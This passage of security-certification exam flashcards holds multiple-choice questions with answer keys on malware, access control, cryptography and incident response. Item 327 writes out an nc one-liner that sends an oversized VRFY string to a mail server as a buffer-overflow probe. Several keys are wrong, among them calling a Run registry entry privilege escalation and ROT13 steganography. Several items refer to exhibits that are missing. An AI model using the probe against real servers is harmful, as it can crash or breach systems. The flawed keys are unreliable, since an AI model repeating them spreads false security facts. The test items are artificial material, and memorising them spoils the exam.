The camera system is infected with a bot.
The camera system is infected with a RAT.
The camera system is infected with a Trojan.
The camera system is infected with a backdoor.

A

The camera system is infected with a bot.

305
Q

An accountant is attempting to log in to the internal accounting system and receives a message that the
website’s certificate is fraudulent. The accountant finds instructions for manually installing the new trusted
root onto the local machine. Which of the following would be the company’s BEST option for this situation in the future?

Utilize a central CRL
Implement certificate management
Ensure access to KMS
Use a stronger cipher suite

A

Implement certificate management

306
Q

A salesperson often uses a USB drive to save and move files from a corporate laptop. The corporate laptop was recently updated, and now the files on the USB are read-only. Which of the following was recently added to the laptop?

Antivirus software
File integrity check
HIPS
DLP

A

DLP (data loss prevention)

307
Q

A company hired a firm to test the security posture of its database servers and determine if any vulnerabilities can be exploited. The company provided limited information pertaining to the infrastructure and database server. Which of the following forms of testing does this BEST describe?

Black box
Gray box
White box
Vulnerability scanning

A

Gray box

308
Q

Two companies are enabling TLS on their respective email gateways to secure communications over the
Internet. Which of the following cryptography concepts is being implemented?

Perfect forward secrecy
Ephemeral keys
Domain validation
Data in transit

A

Data in transit

309
Q

An administrator is implementing a secure web server and wants to ensure that if the web server application s
compromised, the application does not have access to other parts of the server or network. Which of the
following should the administrator implement? (Select TWO.)

Mandatory access control
Discretionary access control
Rule-based access control
Role-based access control
Attribute-based access control
A

Rule-based access control

and

Role-based access control

310
Q

Which of the following is a compensating control that will BEST reduce the risk of weak passwords?

Requiring the use of one-time tokens
Increasing password history retention count
Disabling user accounts after exceeding maximum attempts
Setting expiration of user passwords to a shorter time

A

Requiring the use of one-time tokens

311
Q

A security administrator has configured a RADIUS and a TACACS+ server on the company’s network.
Network devices will be required to connect to the TACACS+ server for authentication and send accounting information to the RADIUS server. Given the following information:

RADIUS IP: 192.168.20.45
TACACS+ IP: 10.23.65.7

Which of the following should be configured on the network clients? (Select two.)

Accounting port: TCP 389
Accounting port: UDP 1812
Accounting port: UDP 1813
Authentication port: TCP 49
Authentication port: TCP 88
Authentication port: UDP 636
A

Accounting port: UDP 1813

and

Authentication port: TCP 49

312
Q

A network administrator is creating a new network for an office. For security purposes, each department
should have its resources isolated from every other department but be able to communicate back to central servers. Which of the following architecture concepts would BEST accomplish this?

Air gapped network
Load balanced network
Network address translation
Network segmentation

A

Network segmentation

313
Q

Which of the following outcomes is a result of proper error-handling procedures in secure code?

Execution continues with no notice or logging of the error condition.
Minor fault conditions result in the system stopping to preserve state.
The program runs through to completion with no detectable impact or output.
All fault conditions are logged and do not result in a program crash.

A

All fault conditions are logged and do not result in a program crash

314
Q

Datacenter employees have been battling alarms in a datacenter that has been experiencing hotter than normal temperatures. The server racks are designed so all 48 rack units are in use, and servers are installed in any manner in which the technician can get them installed.
Which of the following practices would BEST alleviate the heat issues and keep costs low?

Utilize exhaust fans.
Use hot and cold aisles.
Airgap the racks.
Use a secondary AC unit.

A

Use hot and cold aisles

315
Q

An analyst is part of a team that is investigating a potential breach of sensitive data at a large financial services organization. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data?

Keylogger
Botnet
Crypto-malware
Backdoor
Ransomware
DLP
A

Backdoor

316
Q

Which of the following refers to the term used to restore a system to its operational state?

MTBF
MTTR
RTO
RPO

A

MTTR

317
Q

Which of the following uses precomputed hashes to guess passwords?

Iptables
NAT tables
Rainbow tables
ARP tables

A

Rainbow tables

318
Q

While investigating a virus infection, a security analyst discovered the following on an employee laptop:
Multiple folders containing a large number of newly released movies and music files
Proprietary company data
A large amount of PHI data
Unapproved FTP software
Documents that appear to belong to a competitor
Which of the following should the analyst do FIRST?

Contact the legal and compliance department for guidance
Delete the files, remove the FTP software, and notify management
Back up the files and return the device to the user
Wipe and reimage the device

A

Contact the legal and compliance department for guidance

319
Q

Which of the following would be considered multifactor authentication?

Hardware token and smart card
Voice recognition and retina scan
Strong password and fingerprint
PIN and security QUESTION NO:s

A

Strong passowrd and fingerprint

320
Q

Ann, a new employee, received an email from an unknown source indicating she needed to click on the
provided link to update her company’s profile. Once Ann clicked the link, a command prompt appeared with
the following output:
Which of the following types of malware was executed?

Ransomware
Adware
Spyware
Virus

A

Virus

321
Q

A network administrator needs to allocate a new network for the R&D group. The network must not be
accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of
the following settings should the network administrator implement to accomplish this?

Configure the OS default TTL to 1
Use NAT on the R&D network
Implement a router ACL
Enable protected ports on the switch

A

Configure the OS default TTL to 1

322
Q

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant
items. Which of the following BEST describe why this has occurred? (Select TWO)

Privileged-user certificated were used to scan the host
Non-applicable plugins were selected in the scan policy
The incorrect audit file was used
The output of the report contains false positives
The target host has been compromised

A

Non-applicable plugins were selected in the scan policy

and

The output of the report contains false positives

323
Q

Which of the following metrics are used to calculate the SLE? (Select TWO)

ROI
ARO
ALE
MTBF
MTTF
TCO
A

ARO

and

ALE

324
Q

A systems administrator is deploying a new mission essential server into a virtual environment. Which of the
following is BEST mitigated by the environment’s rapid elasticity characteristic?

Data confidentiality breaches
VM escape attacks
Lack of redundancy
Denial of service

A

Denial of service

325
Q

A member of the human resources department is searching for candidate resumes and encounters the following error message when attempting to access popular job search websites:

Which of the following would resolve this issue without compromising the company’s security policies?

Renew the DNS settings and IP address on the employee’s computer
Add the employee to a less restrictive group on the content filter
Remove the proxy settings from the employee’s web browser
Create an exception for the job search sites in the host-based firewall on the employee’s computer

A

Add the employee to a less restrictive group on the content filter

326
Q

When sending messages using symmetric encryption, which of the following must happen FIRST?

Exchange encryption key
Establish digital signatures
Agree on an encryption method
Install digital certificates

A

Agree on an encryption method

327
Q

During a routine vulnerability assessment, the following command was successful:

echo “vrfy ‘perl -e ‘print “hi” x 500 ‘ ‘ “ | nc www.company.com 25

Which of the following vulnerabilities is being exploited?

Buffer overflow directed at a specific host MTA
SQL injection directed at a web server
Cross-site scripting directed at www.company.com
Race condition in a UNIX shell script

A

Buffer overflow directed at a specific host MTA

328
Q

Which of the following are considered to be “something you do”? (Choose two.)

Iris scan
Handwriting
CAC card
Gait
PIN
Fingerprint
A

Handwriting

and

Gait

329
Q

Which of the following is used to validate the integrity of data?

CBC
Blowfish
MD5
RSA

A

MD5

330
Q

A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application’s data is encrypted at rest, and the application’s connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned
controls. Which of the following will be the MOST efficient security control to implement to lower this risk?

Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact
information.

Restrict screen capture features on the devices when using the custom application and the contact
information.

Restrict contact information storage dataflow so it is only shared with the customer application.

Require complex passwords for authentication when accessing the contact information.

A

Restrict contact information storage dataflow so it is only s hared with the customer application.

331
Q

A security analyst is specifying requirements for a wireless network. The analyst must explain the security features provided by various architecture choices.
Which of the following is provided by PEAP, EAP-TLS, and EAP-TTLS?

Key rotation
Mutual authentication
Secure hashing
Certificate pinning

A

Mutual authentication

332
Q

A company stores highly sensitive data files used by the accounting system on a server file share. The
accounting system uses a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows:

File system permissions: Users = Read Only
Share permission: accounting-svc = Read Only
Given the listed protections are in place and unchanged, to which of the following risks is the data still subject?

Exploitation of local console access and removal of data
Theft of physical hard drives and a breach of confidentiality
Remote exfiltration of data using domain credentials
Disclosure of sensitive data to third parties due to excessive share permissions

A

Exploitation of local console access and removal of data

333
Q

An organization has hired a new remote workforce. Many new employees are reporting that they are unable to access the shared network resources while traveling. They need to be able to travel to and from different locations on a weekly basis. Shared offices are retained at the headquarters location. The remote workforce will have identical file and system access requirements, and must also be able to log in to the headquarters location remotely. Which of the following BEST represent how the remote employees should have been set up initially? (Choose two.)

User-based access control
Shared accounts
Group-based access control
Mapped drives
Individual accounts
Location-based policies
A

Group-based access control

and

Individual accounts

334
Q

Which of the following is a technical preventive control?

Two-factor authentication
DVR-supported cameras
Acceptable-use MOTD
Syslog server

A

Two-factor authentication

335
Q

Which of the following penetration testing concepts is an attacker MOST interested in when placing the path
of a malicious file in the Windows/CurrentVersion/Run registry key?

Persistence
Pivoting
Active reconnaissance
Escalation of privilege

A

Escalation of privilege

336
Q

A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access?

Phishing
Man-in-the-middle
Tailgating
Watering hole
Shoulder surfing
A

Tailgating

337
Q

A technician is investigating a potentially compromised device with the following symptoms:

Browser slowness
Frequent browser crashes
Hourglass stuck
New search toolbar
Increased memory consumption

Which of the following types of malware has infected the system?

Man-in-the-browser
Spoofer
Spyware
Adware

A

Adware

338
Q

A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the
evidence, which of the following actions is the NEXT step to minimize the business impact?

Launch an investigation to identify the attacking host
Initiate the incident response plan
Review lessons learned captured in the process
Remove malware and restore the system to normal operation

A

Remove malware and restore the system to normal operation

339
Q

A Chief Information Security Officer (CISO) asks the security architect to design a method for contractors to
access the company’s internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO?

VPN
PaaS
IaaS
VDI

A

VPN

340
Q

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server:

Which of the following did the security administrator discover?

Ransomeware
Backdoor
Logic bomb
Trojan

A

Logic bomb

341
Q

A security, who is analyzing the security of the company’s web server, receives the following output:

Which of the following is the issue?

Code signing
Stored procedures
Access violations
Unencrypted credentials

A

Unencrypted credentials

342
Q

During an audit, the auditor requests to see a copy of the identified mission-critical applications as well as their disaster recovery plans. The company being audited has an SLA around the applications it hosts. With which of the following is the auditor MOST likely concerned?

ARO/ALE
MTTR/MTBF
RTO/RPO
Risk assessment

A

RTO/RPO

343
Q

A company is deploying a file-sharing protocol access a network and needs to select a protocol for
authenticating clients. Management requests that the service be configured in the most secure way possible.
The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish this task?

Store credentials in LDAP
Use NTLM authentication
Implement Kerberos
Use MSCHAP authentication

A

Implement Kerberos

344
Q

A security administrator needs to configure remote access to a file share so it can only be accessed between the hours of 9:00 a.m. and 5:00 p.m. Files in the share can only be accessed by members of the same department as the data owner. Users should only be able to create files with approved extensions, which may differ by department. Which of the following access controls would be the MOST appropriate for this situation?

RBAC
MAC
ABAC
DAC

A

ABAC

345
Q

During a penetration test, the tester performs a preliminary scan for any responsive hosts. Which of the following BEST explains why the tester is doing this?

To determine if the network routes are improperly forwarding request packets
To identify the total number of hosts and determine if the network can be victimized by a DoS attack
To identify servers for subsequent scans and further investigation
To identify the unresponsive hosts and determine if those could be used as zombies in a follow-up scan.

A

To identify servers for subsequent scans and further investigation

346
Q

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?

Identify the source of the active connection
Perform eradication of active connection and recover
Performance containment procedure by disconnecting the server
Format the server and restore its initial configuration

A

Identify the source of the active connection

347
Q

A help desk technician receives a phone call from an individual claiming to be an employee of the
organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?

Phishing
Shoulder surfing
Impersonation
Dumpster diving

A

Impersonation

348
Q

Using an ROT13 cipher to protocol confidential information for unauthorized access is known as:

Steganography
Obfuscation
Non repudiation
diffusion

A

Steganography

349
Q

The Chief Information Security Officer (CISO) in a company is working to maximize protection efforts of
sensitive corporate data. The CISO implements a “100% shred” policy within the organization, with the intent to destroy any documentation that is not actively in use in a way that it cannot be recovered or reassembled.

Which of the following attacks is this deterrent MOST likely to mitigate?

Dumpster diving
Whaling
Shoulder surfing
Vishing

A

Dumpster diving

350
Q

Which of the following attackers generally possesses minimal technical knowledge to perform advanced
attacks and uses widely available tools as well as publicly available information?

Hacktivist
White hat hacker
Script kiddie
Penetration tester

A

Script Kiddie

351
Q

A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote
resources.

Which of the following is the immediate NEXT step the technician should take?

Determine the source of the virus that has infected the workstation.
Sanitize the workstation’s internal drive.
Reimage the workstation for normal operation.
Disable the network connections on the workstation.

A

Disable the network connections on the workstation